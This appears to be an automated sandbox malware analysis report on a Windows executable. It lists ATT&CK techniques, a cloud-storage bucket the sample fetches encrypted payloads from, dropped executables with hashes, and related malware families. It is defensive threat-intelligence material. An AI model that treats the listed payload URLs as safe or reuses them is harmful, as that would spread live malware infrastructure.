Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Virtualization/Sandbox Evasion | LSASS Memory | 251 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Abuse Elevation Control Mechanism | NTDS | 12 Process Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 213 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

Source | Detection | Scanner | Label | Link
1387457-38765948.15.exe | 8% | Virustotal | |
Source | Detection | Scanner | Label | Link
C:\Users\user\Documents\c4wtKa.exe | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com | 47.101.26.25 | true | false | | unknown
jcoiw1.oss-cn-shanghai.aliyuncs.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dat | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gif | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gif | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifshangh | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifcm.ali | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/d.gif | 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.microsoft | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.dats | 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.thawte.com0 | 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr | false | | high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giffS | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifnet-cn | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifta | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/o | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://yandex.com0 | 1387457-38765948.15.exe | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.giff7 | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/ | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/i.datC: | 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifW | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.symauth.com/cps0( | 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr | false | | high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gif;6? | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifv | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/hanghai.aliyuncs.com/ | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2246122658-3693405117-2476756634-1003R | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifs | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifIQ | 1387457-38765948.15.exe, 00000000.00000002.3287821784.0000000000140000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/K | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifY | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giffO | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003 | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifhttps://jcoiw1.oss-cn-shanghai.aliyuncs.com/b.gifht | 1387457-38765948.15.exe, 00000000.00000002.3287821784.000000000014C000.00000004.00000010.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000637000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000637000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifom | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0 | 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr | false | | high
http://www.symauth.com/rpa00 | 1387457-38765948.15.exe, 00000000.00000003.3270532436.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269899771.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3295210426.00000000115A6000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269698239.00000000115E3000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270651876.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3270001740.00000000115E8000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269726209.00000000115A3000.00000004.00000020.00020000.00000000.sdmp, c4wtKa.exe.0.dr | false | | high
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifom | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/-2476756634-1003? | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/W | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/a.gifnghai.aliyuncs.com/a.gif | 1387457-38765948.15.exe, 00000000.00000003.3269760522.0000000000609000.00000004.00000020.00020000.00000000.sdmp, 1387457-38765948.15.exe, 00000000.00000002.3287970622.00000000005F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.giff7 | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://jcoiw1.oss-cn-shanghai.aliyuncs.com/c.gifcn-sha | 1387457-38765948.15.exe, 00000000.00000002.3287970622.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
47.101.26.25 | sc-2wln.cn-shanghai.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1589380
                Start date and time:2025-01-12 04:03:12 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:1387457-38765948.15.exe
                Detection:MAL
                Classification:mal72.evad.winEXE@1/5@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 9
                • Number of non-executed functions: 30
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:04:06 | API Interceptor | 941x Sleep call for process: 1387457-38765948.15.exe modified
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 80P.exe | malicious | I2PRAT | 120.26.116.232
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 5.elf | malicious | Unknown | 123.56.46.120
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2976587-987347589.07.exe | malicious | Nitol, Xmrig | 118.178.60.103
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2976587-987347589.08.exe | malicious | Nitol | 118.178.60.9
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2976587-987347589.08.exe | malicious | Unknown | 39.103.20.105
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 2976587-987347589.07.exe | malicious | Unknown | 39.103.20.105
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 5.elf | malicious | Unknown | 139.240.73.120
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | 4.elf | malicious | Unknown | 42.120.233.253
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | AuKUol8SPU.exe | malicious | FormBook | 8.136.96.106
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | frosty.x86.elf | malicious | Mirai | 47.110.90.76
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | build.exe | malicious | Vidar | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | zmpZMfK1b4.exe | malicious | CredGrabber, Meduza Stealer | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | ix8kxoBHDb.exe | malicious | Remcos, GuLoader | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | b0cQukXPAl.exe | malicious | LummaC | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | c7WJL1gt32.exe | malicious | GuLoader, MassLogger RAT | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | ZaRP7yvL1J.exe | malicious | MassLogger RAT | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | grrezORe7h.exe | malicious | GuLoader, MassLogger RAT | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | 14lVOjBoI2.exe | malicious | GuLoader, MassLogger RAT | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | Qg79mitNvD.exe | malicious | GuLoader, MassLogger RAT | 47.101.26.25
37f463bf4616ecd445d4a1937da06e19 | lkETeneRL3.exe | malicious | Snake Keylogger, VIP Keylogger | 47.101.26.25
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Documents\c4wtKa.exe | 2976587-987347589.07.exe | malicious | Nitol, Xmrig
C:\Users\user\Documents\c4wtKa.exe | 2976587-987347589.08.exe | malicious | Nitol
C:\Users\user\Documents\c4wtKa.exe | 2976587-987347589.08.exe | malicious | Unknown
C:\Users\user\Documents\c4wtKa.exe | 2976587-987347589.07.exe | malicious | Unknown
C:\Users\user\Documents\c4wtKa.exe | 2873466535874-68348745.02.exe | malicious | Unknown
C:\Users\user\Documents\c4wtKa.exe | 2362476847-83854387.07.exe | malicious | Nitol
C:\Users\user\Documents\c4wtKa.exe | 2362476847-83854387.07.exe | malicious | Unknown
C:\Users\user\Documents\c4wtKa.exe | 2o63254452-763487230.06.exe | malicious | Nitol
C:\Users\user\Documents\c4wtKa.exe | 2o63254452-763487230.06.exe | malicious | Unknown
C:\Users\user\Documents\c4wtKa.exe | e2664726330-76546233.05.exe | malicious | Nitol
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):125333
                                    Entropy (8bit):7.993522712936246
                                    Encrypted:true
                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                    Category:dropped
                                    Size (bytes):135589
                                    Entropy (8bit):7.995304392539578
                                    Encrypted:true
                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):5.067240743211155
                                    Encrypted:false
                                    SSDEEP:6:Wqz+RbLTQWwaahywqz+RdTQWwaVqdx9SK3TAn:MRbncRJVR/n
                                    MD5:FF6D9354842B497B290F2E5509598F49
                                    SHA1:4759F3F2D488558EBC30D7EF5118C27B74263B2D
                                    SHA-256:D26FFD662AD136301DB0E27A15447C11530D9BB5F7B2832ABCA227ED2ABB317D
                                    SHA-512:AF67A7A0266D0BF304761D28A11C561632D5CEB1E5EAD5D6BC2AC7B2DDF41F78FB7C1427CA23C848EF5E11F21CD616A4FFC02BF5401DB6DF6B2C3379DB56FE02
                                    Malicious:false
                                    Reputation:low
                                    Preview:....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@!n')O)))))))))))))))))))))))))))))))A]]Y*cvv....h.1p..].}>`{....rz=r....idt)JFD.d(ao.ooooooooooooooooooooooooooooooo....l%00ZS_Y.hw6EE.U;x&=\SZU4<{4X]MA/"2o...@#n')O)))))))))))))))))))))))))))))))A]]Y*cvv....h.1p..].}>`{....rz=r....idt)JFD.b(ao.ooooooooooooooooooooooooooooooo....zww5PMP5555555555555555555555555555555555555CFPY6>w=QQ======================================jROY)8=.vskz.T..................................UkUh$...2x}hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):133136
                                    Entropy (8bit):6.350273548571922
                                    Encrypted:false
                                    SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                    MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                    SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                    SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                    SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Joe Sandbox View:
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.08.exe, Detection: malicious, Browse
                                    • Filename: 2976587-987347589.07.exe, Detection: malicious, Browse
                                    • Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse
                                    • Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\1387457-38765948.15.exe
                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                    Category:dropped
                                    Size (bytes):122880
                                    Entropy (8bit):6.002066263941358
                                    Encrypted:false
                                    SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52FF:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gF
                                    MD5:E3B74D8EADD94CCEB49435F9BA617289
                                    SHA1:5E7324DABD7A1CB5F6DC9E7D6C3E022511A3FFB2
                                    SHA-256:C4B771D38C0DFB51122B93C7B3F82849B0C669967C1E342D546C6FABFC8900F7
                                    SHA-512:63E71049A3AFD004E3BFFEF5A32A5CE656053D42E6C995DEF08C0E292EF44A7D69A0EF453B8EEFFC798FD7EB23A8924550D03A6114135E75124E064D8B9A31EA
                                    Malicious:true
                                    Reputation:low
